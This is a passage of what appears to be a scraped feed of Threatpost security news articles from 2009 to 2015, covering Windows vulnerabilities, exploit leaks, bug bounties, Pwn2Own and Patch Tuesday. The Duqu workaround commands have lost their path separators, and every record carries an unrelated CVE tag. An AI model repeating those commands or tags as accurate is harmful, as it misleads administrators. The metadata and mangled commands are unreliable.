week\u2019s November patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%syswow64t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time.,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:06", "description": "[![Blue Hat Prize](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07061225/bluehat.jpg)](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>)LAS VEGAS\u2013In the face of mounting external pressure to begin paying bug bounties, Microsoft is instead launching a new program that will pay a $200,000 top prize to a security researcher who develops the most innovative defensive security technology. The program is designed to \u201cinspire researchers to focus their talents on defensive technologies,\u201d the company said.\n\nKnown as the Blue Hat Prize, after the company\u2019s regular internal research conferences, the program will focus in its first year on getting researchers to design a novel runtime technology to defend against memory safety vulnerabilities. Microsoft security officials said that rather than paying for individual bugs the way that some other companies such as Google, Mozilla and others do, they wanted to encourage researchers to think about ways to defeat entire classes of bugs.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d said Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nUnder the rules of the Blue Hat Prize program, any researcher 14 or older is eligible, and the researchers who win prizes will not only get the cash prize, but also will retain full intellectual property rights to the technology. The winners have to agree to license the technology to Microsoft, however.\n\nThe top prize is $200,000, with second prize paying $50,000 and third prize is a one-year MSDN subscription, which is worth $10,000. Microsoft also will fly the three winners to Black Hat next year.\n\nResearchers have been calling for [Microsoft to start a bug bounty program](<https://threatpost.com/does-microsoft-need-bug-bounties-050511/>) for several years now, and company officials has repeatedly said that Microsoft is not interested in paying for individual vulnerabilities. This new program gets around the semantics of all that by encouraging researchers to find a new way to mitigate attacks against an entire class of bugs. \n\n\u201cTwo examples of open \nproblems that are suitable for consideration in this challenge are address space \ninformation disclosures and return-oriented programming (ROP). Note that you are \nnot required to address these and you are not limited to these examples,\u201d Microsoft said in the rules for the program, which are on the [Blue Hat Prize site](<http://www.microsoft.com/security/bluehatprize/>). \n\nEntries are going to be judged by a panel of security experts from Microsoft teams, including the Microsoft Security Response Center, the Windows team and others. \n\nMoussouris said that Microsoft was looking for a way to inspire researchers to focus their talents on defensive technologies and not just finding bugs.\n\n\u201cThis seemed the best way for us to engage with the research community and protect customers simultaneously,\u201d she said.\n", "cvss3": {}, "published": "2011-08-03T17:34:12", "type": "threatpost", "title": "Microsoft to Pay $200,000 for Innovative Defense Technology in Blue Hat Prize Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:03", "id": "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "href": "https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/75507/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060238/barracuda_bugs.png)](<https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/>)Following the lead of Mozilla and Google, Barracuda Networks is launching a bug bounty program that will pay out cash rewards for vulnerabilities found in the company\u2019s own products.\n\nThe move by Barracuda, a maker of mail security and data protection products, is the first such bug bounty program offered by a pure security technology vendor. Mozilla and Google are the two most prominent examples of general technology companies that offers rewards for vulnerabilities, and both of those companies have seen their programs succeed in the last year. In fact, both Google and Mozilla have raised the prices that they pay for the most severe bugs, with [Mozilla shelling out up to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>) and [Google paying as much as $3,133.7 for bugs](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nBarracuda officials said they\u2019ll match Google\u2019s top price for severe bugs and the minimum bug bounty will be $500. The company will only pay out rewards for bugs that are disclosed privately to Barracuda, although once the bug is fixed, the researcher is free to disclose it publicly. Bugs found in barracuda\u2019s Spam and Virus Firewall, Web Filter, Web Application Firewall and NG Firewall are eligible for the cash rewards. \n\nBugs that are in scope for the reward program are vulnerabilities that compromise confidentiality, availability, \nintegrity or authentication. Those would include vulnerabilities such as remote exploits, privilege \nescalation, cross site scripting, code execution, command injection. \n\n\u201cSecurity product vendors should be at the \nforefront of promoting security research,\u201d Paul Judge, chief research \nofficer at Barracuda Networks, said in a statement. \u201cThis initiative reflects our commitment to \nour customers and the security community at large. The goal of this program is \nto reward researchers for their hard work as well as to promote and encourage \nresponsible disclosure.\u201d\n\nAs a profitable, legitimate market for vulnerability information has developed in recent years with the success of the Zero Day Initiative and other third-party brokers, there has been more and more pressure on the vendors themselves to pay for bugs. \n\nWhile Mozilla and Google officials have been happy with the results of \ntheir bug bounty programs\u2013[Google in fact just expanded its program to \nits web properties](<https://threatpost.com/google-extends-bug-bounty-web-properties-110110/>)\u2013and researchers have praised the companies for \nrecognizing their work, other high-profile software vendors have stayed \non the sidelines. Microsoft officials have repeatedly said that the \ncompany will not pay for bugs and Apple and Adobe, which have been under \nincreased scrutiny by attackers and researchers of late, have not \noffered bounties either.\n", "cvss3": {}, "published": "2010-11-09T14:28:15", "type": "threatpost", "title": "Barracuda Networks Launches Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:14:41", "id": "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "href": "https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/74652/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:02", "description": "**UPDATE \u2013 **Microsoft\u2019s characterization of [MS15-034](<https://technet.microsoft.com/library/security/MS15-034>) as a remote code execution vulnerability certainly has a lot of Windows server admins on edge waiting for the other shoe to drop.\n\nIn the three days since the bulletin was released warning of a [critical vulnerability in the HTTP protocol stack](<https://threatpost.com/microsoft-patches-critical-http-sys-vulnerability/112251>), HTTP.sys, security experts, including the SANS Institute, have warned of publicly available denial-of-service exploits targeting Microsoft IIS webservers. There\u2019s also the possibility of information leakage via this issue that could pave the way for more serious attacks, but for now, a crashing and rebooting IIS server might be your only sign of trouble.\n\n\u201cSo far we see active exploitation for the denial-of-service vulnerability. The information disclosure vulnerability has been demonstrated, but we have not seen it used against any of our honeypots yet, nor have we seen any reports of it being used in attacks,\u201d Johannes Ullrich of the SANS Institute told Threatpost.\n\nUllrich was quick to point out too that there are Internet-wide scans happening now, that are not just looking for vulnerable servers, but also trying to crash them.\n\n\u201cIt\u2019s extremely easy to exploit,\u201d Ullrich said during an emergency webcast last night. \u201cThat\u2019s the problem with this vulnerability, it\u2019s so easy.\u201d\n\nMicrosoft, meanwhile, said customers should prioritize this bulletin and patch as soon as possible.\n\n\u201cUpdate MS15-034 was classified as a remote code execution bulletin because, while that type of exploit is harder to carry out it is theoretically possible,\u201d said a Microsoft spokesperson.\n\nThe SANS Internet Storm Center yesterday [raised its alert level](<https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/1/>), and said active exploits were hitting its honeypots from 78[.]186[.]123[.]180. Some reported to the ISC attacks they believed were more targeted against specific webservers.\n\n\u201cIf you have been the subject of a denial-of-service attack in the past, this is a much better and easier way to achieve the same thing than doing NTP reflection or whatever against your server,\u201d Ullrich said. \u201cThis is the main exposure right now.\u201d\n\nWhile IIS, or Internet Information Services servers, are the principal attack vector right now, this isn\u2019t necessarily solely an IIS problem. Lots of services make use of HTTP.sys.\n\n\u201cIt\u2019s really not an IIS vulnerability, but it is exposed via IIS,\u201d Ullrich said. \u201cThe HTTP.sys vulnerability: Every Windows system has it whether it\u2019s running IIS or not. It\u2019s a system library that implements the parsing of http requests and implements caching content in kernel memory.\u201d\n\nOne of Microsoft\u2019s workarounds, for example, was to disable IIS kernel caching, but there is a gotcha.\n\n\u201cTurning off kernel caching will prevent the exploit. The system is only vulnerable if kernel caching is turned on,\u201d Ullrich said. \u201cHowever, it will cause a significant loss in performance, so this may then turn into a denial of service for a busy site as it can no longer fulfill all requests.\u201d\n\nThe crux of the vulnerability lies in the range header, which extracts portions of webpages from kernel memory and passes them to the client. A [specifically crafted range header](<http://blog.didierstevens.com/2015/04/17/ms15-034-detection-some-observations/>) will trigger the denial-of-service vulnerability so long as certain conditions are met within the range. This has the potential to be quite disruptive, despite the vast majority of webservers being Linux boxes (70 million Windows servers could be affected according to [Netcraft](<http://news.netcraft.com/archives/2015/04/16/critical-windows-vulnerability-affects-at-least-70-million-websites.html>)).\n\nThe information disclosure weakness is concerning as well because there are ways to get a kernel memory dump back in a response from HTTP.sys. This will evoke memories of Heartbleed, which also led to memory leakage and inevitably a slew of exploits with varying results. Ullrich said that memory disclosure in this case, however, is trickier to retrieve than with Heartbleed, but it could be used to inch closer to remote code execution.\n\n\u201cCurrently, there is no known exploit that would cause remote code execution. Likely, an attacker would first have to use the information disclosure vulnerability to learn more about the internal memory layout to then follow up with a remote code execution exploit,\u201d he said. \u201cBut since the information disclosure attack will also cause a reboot, this information may not be all that valuable.\u201d\n\n_This article was updated at 1 p.m. ET with a comment from Microsoft._\n", "cvss3": {}, "published": "2015-04-17T11:06:54", "type": "threatpost", "title": "Active DoS Exploits for MS15-034 Under Way", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T14:51:48", "id": "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "href": "https://threatpost.com/active-dos-exploits-for-ms15-034-under-way/112314/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "[![MS12-020 RDP Exploit Found, Researchers Say Code May Have Leaked From Security Vendor](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065334/ms12020.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065334/ms12020.jpg>)There is a confirmed legitimate working exploit for the [MS12-020 RDP vulnerability](<https://threatpost.com/microsoft-fixes-critical-rdp-vulnerability-march-patch-tuesday-031312/>) in Windows circulating already and researchers say it is capable of either crashing or causing a denial-of-service condition on vulnerable machines. Microsoft has warned customers about the possibility of the exploit surfacing quickly and advised them to patch the flaw immediately. The researcher who discovered the vulnerability said that the packet he included in his original advisory was found in the exploit, raising the specter of a data leak somewhere in the pipeline.\n\nThe exploit surfaced on a Chinese download site in the last couple of days and researchers have been able to confirm that it causes a blue screen of death on some systems and a DoS condition on other versions of Windows. Experts have said that the RDP bug, which was discovered by Luigi Auriemma, has the potential to be used as the basis for a large-scale worm and the existence of a working exploit is the first step down that road. The exploit will produce a BSOD on Windows 7 and a DoS on Windows XP.\n\nThe security research community was buzzing on Friday morning with the news that the exploit from the Chinese site contained an exact copy of the information Microsoft sent out to the members of its Microsoft Active Protection Program (MAPP). That program grants early access to vulnerability and patch information to a select, vetted group of security and antimalware companies, allowing them to prepare defenses for the bugs that Microsoft will patch each month. When the MAPP program began four years ago, Microsoft said that it would take precautions to guard against the possibility of a leak of that valuable information, but didn\u2019t spell out what those measures might be.\n\n\u201cThe amount of time between the release of a patch and the release of the exploit code [for that patch] continues to shorten and customers have been asking for information to react to this,\u201d Mike Reavey of the Microsoft Security Response Center told Threatpost editor [Ryan Naraine in 2008](<http://www.zdnet.com/blog/security/microsoft-makes-daring-vulnerability-sharing-move/1646>).\n\n* * *\n\n**Listen** Digital Underground podcast: Ryan Naraine on Exploit Mitigations and the MS12-020 RDP Bug <https://media.threatpost.com/wp-content/uploads/sites/103/2012/03/07052334/digital_underground_95.mp3>\n\n* * *\n\nThat window now appears to be as small as ever. Microsoft released its patch on Tuesday and the exploit code was found on the Chinese site that same day. MAPP members get the data on soon-to-be-patched flaws a day or more before the patches are released to the public. This month, the MAPP info went out about 24 hours before the patch release.\n\nMicrosoft officials were unavailable for comment on Friday morning.\n\nAuriemma said that the exploit code found on the Chinese site contains the exact packet that he sent to TippingPoint\u2019s Zero Day Initiative in his original advisory on the vulnerability. ZDI engineers typically confirm the bug, work up a protection signature for TippingPoint\u2019s appliances and then send the data on to the affected company, in this case Microsoft.\n\n\u201cThe packet stored in the \u2018chinese\u2019 rdpclient.exe PoC is the EXACT ONE I gave to ZDI!!! [~~@~~**thezdi**](<http://twitter.com/thezdi>)? [~~@~~**microsoft**](<http://twitter.com/microsoft>)? who leaked?,\u201d [Auriemma said in a message on Twitter](<http://twitter.com/#%21/luigi_auriemma/statuses/180530223366938624>) early Friday.\n\nIn an email interview, Auriemma said he had no doubts that the code in the exploit was his and that the code leak came from Microsoft.\n\n\u201cThe packet I gave to ZDI was unique because I modified it by hand. There are no doubts on this thing,\u201d he said. \u201cMicrosoft is the source of the leak, probably during the distribution to MAPP partners, but I still have some doubts.\u201d\n\nIn addition to the code from Auriemma, researchers said that there was additional information in the exploit found on the Chinese site that was only available to MAPP members. One researcher said that he was positive that there had been a leak somewhere along the chain, but wasn\u2019t sure where it had occurred.\n\nAuriemma [said on his Web site](<http://aluigi.org/>) that once he discovered that the proof-of-concept code that was available contained his packet, he decided to release his original advisory with the full information in it.\n\n\u201cNow that my proof-of-concept is out (yeah rdpclient.exe is the poc written by Microsoft in November 2011 using the example packet I sent to ZDI) I have decided to release my original advisory and proof-of-concept packet written the 16 May 2011,\u201d he said.\n\n_Note: Kaspersky Lab is a member of the MAPP program, but Threatpost editors do not have access to the MAPP data provided by Microsoft._\n", "cvss3": {}, "published": "2012-03-16T12:20:26", "type": "threatpost", "title": "MS12-020 RDP Exploit Found, Researchers Say Code May Have Leaked From Security Vendor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:31:06", "id": "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "href": "https://threatpost.com/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612/76336/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055731/xps2.jpg)](<https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/>)Unless thousands of companies still using Windows XP SP2 computers \nsuddenly stop procrastinating, hackers are going to be in seventh heaven come July 13. [Read the full article](<http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching/>). [The Last Watchdog]\n", "cvss3": {}, "published": "2010-07-12T18:06:21", "type": "threatpost", "title": "XP SP2 Will Soon Be Hacker's Candy Store", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:25:36", "id": "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "href": "https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/74200/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:04", "description": "Microsoft announced today it is suing Britain\u2019s second-largest electronics retailer Comet for allegedly creating and selling more than 94,000 back-up discs of its Windows Vista and Windows XP product.\n\nComet Group PLC allegedly produced counterfeit versions of the software in a factory in Hampshire before selling them in dozens of storefronts for \u00a314.99 each (roughly $23) across the U.K.\n\n\u201cComet\u2019s actions were unfair to customers. We expect better from retailers of Microsoft products \u2013 and our customers deserve better, too,\u201d said David Finn, associate general counsel for Microsoft\u2019s Worldwide Anti-Piracy and Anti-Counterfeiting division in a [press release issued today](<http://www.microsoft.com/Presspass/press/2012/jan12/01-04CometPR.mspx?rss_fdn=Press%20Releases>).![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065006/comet.jpg)\n\nAccording to a report in [The Guardian](<http://www.guardian.co.uk/technology/2012/jan/04/microsoft-sue-comet-windows-discs>), Comet sold the discs between March 2008 and December 2009 and potentially made the company more than \u00a31.4 million, or $2.2 million.\n\nComet plans to contest Microsoft\u2019s claim, reasoning that in producing the discs, they acted in the best interests of their customers and according to a [statement posted to their site](<http://press.comet.co.uk/index.php?cID=330&cType=news>) \u201cdid not infringe Microsoft\u2019s intellectual property.\u201d\n\nWhile it\u2019s currently owned by French company Kesa Electricals PLC, Comet is said to be in the process of being sold to a private investment partnership lead by OpCapita LLP.\n", "cvss3": {}, "published": "2012-01-04T20:41:33", "type": "threatpost", "title": "Microsoft Sues British Electronic Dealer in Alleged Counterfeit Scam", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:03", "id": "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "href": "https://threatpost.com/microsoft-sues-british-electronic-dealer-alleged-counterfeit-scam-010412/76059/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:47", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054257/ie_skull_.jpg)](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>)Ryan Smith, one of the researchers who found the bug in the Microsoft MsVidCtl DLL that the vendor is rushing to patch this week, has posted a [short video demonstration](<http://www.hustlelabs.com/bh2009preview/>) of a technique that bypasses the stop-gap solution of preventing the vulnerable ActiveX control from loading.\n\nIn the demo, Smith, a former researcher with IBM ISS who will be giving a talk on the exploit at the Black Hat conference later this week with Mark Dowd and David Dewey, shows that setting the killbit on the vulnerable control, as Microsoft and others suggested, is not sufficient to prevent exploitation. The demo shows Smith using a new tool called Killbit Visualizer to log the IDs of killbits that are specifically allowed or denied.\n\nHe is then able to get around the killbit protection on the vulnerable video control and cause the calculator to start on the machine.\n\nSmith\u2019s demo comes on the heels of a [blog post by Halvar Flake](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>), a well-known security researcher, who pointed out nearly three weeks ago that simply setting the killbit was not going to protect users against the MsVidCtl flaw. From his post:\n\nSo, where does this leave us ?\n\n 1. The bug is actually much \u201cdeeper\u201d than most people realize.\n\n 2. The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.\n\n 3. The bug might have weaseled it\u2019s way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.\n\n 4. If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.\n\n 5. Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.\n\n 6. There might be a lot of recompiling next week.\n\n 7. IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.\n\nMicrosoft is rushing out an [emergency patch for the vulnerability](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>) on Tuesday.\n", "cvss3": {}, "published": "2009-07-27T15:29:15", "type": "threatpost", "title": "Researcher Shows Killbit is No Defense on MsVidCtl Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:45", "id": "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "href": "https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/73016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "Microsoft issued nine bulletins fixing 16 vulnerabilities in the July 2012 edition of Patch Tuesday. Three of the bulletins received Microsoft\u2019s most severe \u2018critical\u2019 rating, while the remaining six were deemed merely \u2018important.\u2019\n\nFirst and foremost among the critical patches is [MS12-043](<http://go.microsoft.com/fwlink/?LinkID=254824>), a fix for the publicly disclosed and widely publicized XML core services vulnerability that was [actively exploited last month](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Affecting Microsoft Windows, Office, Developer Tools and Server Software, it allowed attackers to execute code remotely after tricking victims into visiting a malicious website in Internet Explorer.\n\n[MS12-044](<http://go.microsoft.com/fwlink/?LinkId=254377>), also critical, is a cumulative security update for Internet Explorer resolving two privately reported bugs that, if unpatched, could allow an attacker to remotely execute code if a user visits a specially crafted webpage using Internet Explorer. Successful exploitation could grant the attacker user-rights, which, as always, will be more troublesome for users who operated with administrative rights.\n\nThe final critical bulletin, [MS12-045](<http://go.microsoft.com/fwlink/?LinkId=254441>), resolves one privately disclosed vulnerability in the data access components of Windows. Like the previous bulletin, this could potentially lead to remote code execution if the user visits a specially crafted website and allow the attacker to gain the same user rights as the current user.\n\nThe remaining \u2018important\u2019 bulletins resolve 12 vulnerabilities altogether, specifically, one bug in Visual Basic for Applications and another in the Windows Shell that could allow for remote code execution. The fix also covers two elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, six in SharePoint, and one more in Office for Mac, in addition to an information disclosure bug in TLS.\n\nYou can find the entire TechNet announcement [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-10T19:23:26", "type": "threatpost", "title": "Three Critical Fixes in July Microsoft Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:28", "id": "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "href": "https://threatpost.com/three-critical-fixes-july-microsoft-patch-tuesday-071012/76785/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:12", "description": "VANCOUVER \u2013 Successful exploits at the Pwn2Own contest get all the glitz, but the rarities are the exploits that fail.\n\nA group of four young South Korean hackers from ASRT, all of them well shy of their thirtieth birthdays, stood in proxy for Jung Hoon Lee. Lee was home fulfilling a military obligation, a promise that kept him from seeing his Internet Explorer 11 exploit come up short Thursday morning.\n\nHP\u2019s Zero Day Initiative, sponsors of the event, said they bought the vulnerability regardless, and worked with the researchers on breaking down the details. The particulars would also be shared with Microsoft as is customary with all bugs purchased by ZDI, sharing them with the affected vendors.\n\nRegistrants at Pwn2Own have 30 minutes to demonstrate their exploit and verify it works by executing the calculator application on the underlying system. In this case, Lee\u2019s exploit was chasing down a vulnerability in IE 11 on a fully patched 64-bit Windows 8.1 machine. A successful exploit would have been worth $100,000.\n\nGenerally, entrants in Pwn2Own withdraw if there are difficulties with their exploits. On Tuesday, Microsoft rolled out another patch for Internet Explorer. The cumulative rollup, a regular Patch Tuesday update, repaired a zero-day in Internet Explorer 10 being used in targeted attacks, including Operation SnowMan targeting the U.S. Veterans of Foreign Wars and a separate attack on a French aerospace manufacturer. It was not disclosed whether the patch affected the Lee exploit.\n\nThe failure of Lee\u2019s exploit was in stark contrast to others demonstrated to that point, including one by German researcher Sebastian Apelt of Siberas who succeeded against IE 11. Apelt\u2019s exploit worked in less than a minute and was good for $100,000. Earlier on Thursday, a pair of Chinese hackers from the Keen Team successfully exploited a zero-day vulnerability in Apple\u2019s Safari browser to gain control of a Macbook running OS X Mavericks. That exploit was worth $65,000 and the members of Keen Team announced they would donate a portion of that to Malaysian charities.\n\nSoon after the IE setback, Pwn2Own regular George Hotz took down Firefox to collect a $50,000 prize. Hotz is perhaps better known for his jailbreaking exploits against the iPhone and the PlayStation gaming console. Hotz\u2019s attack against Firefox was the fourth time zero-days were exploited in the Mozilla browser during the two-day event.\n\nHackers from French exploit vendor Vupen took down both Internet Explorer and Firefox on Wednesday as part of a $350,000 haul. Vupen also beat Adobe Reader and Flash. On Thursday, Vupen has another exploit for Chrome worth another $100,000. Once the Keen Team popped Safari today, Vupen withdrew its Safari bug. It also withdrew its Java entry on Wednesday.\n\nVupen founder Chaouki Bekrar said his researchers prepared for two months in advance on Pwn2Own and had little trouble with IE 11 yesterday, using a a use-after-free vulnerability combined with an \u201cobject confusion\u201d to bypass the IE sandbox, Bekrar said.\n\n\u201cIt\u2019s definitely getting harder to exploit browsers, especially on Windows 8.1,\u201d Bekrar said. \u201cExploitation is harder and finding zero-days in browsers is harder.\u201d\n\nVupen\u2019s successful exploit of Firefox on Wednesday also took advantage of a different use-after-free zero day to bypass ASLR and DEP memory protections in Windows. Bekrar said the bug was found through the use of fuzzers against 60 million test cases.\n\n\u201cThat proves Firefox has done a great job fixing flaws; the same for Chrome,\u201d Bekrar said. \u201cChrome has the strongest sandbox, so that\u2019s even more difficult to create exploits for.\u201d\n\nZDI announced prior to the event it would buy all the Pwn2Own bugs at a price of close to $1.1 million.\n", "cvss3": {}, "published": "2014-03-13T19:33:53", "type": "threatpost", "title": "IE 11 Stands Up to Pwn2Own Exploit Attempt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-13T23:33:53", "id": "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "href": "https://threatpost.com/ie-11-stands-up-to-pwn2own-exploit-attempt/104786/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure enterprises may be engrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s sChannel, the SSL/TLS implementation in Windows, was patched in November but within days, the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). It was re-issued in short order, but coincidently or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users that last week was made public along with proof-of-concept code, still is unpatched and Microsoft has been silent on when a fix is coming. That silence, could in part, be due to the fact that the company recently [discontinued providing users with advanced notification of 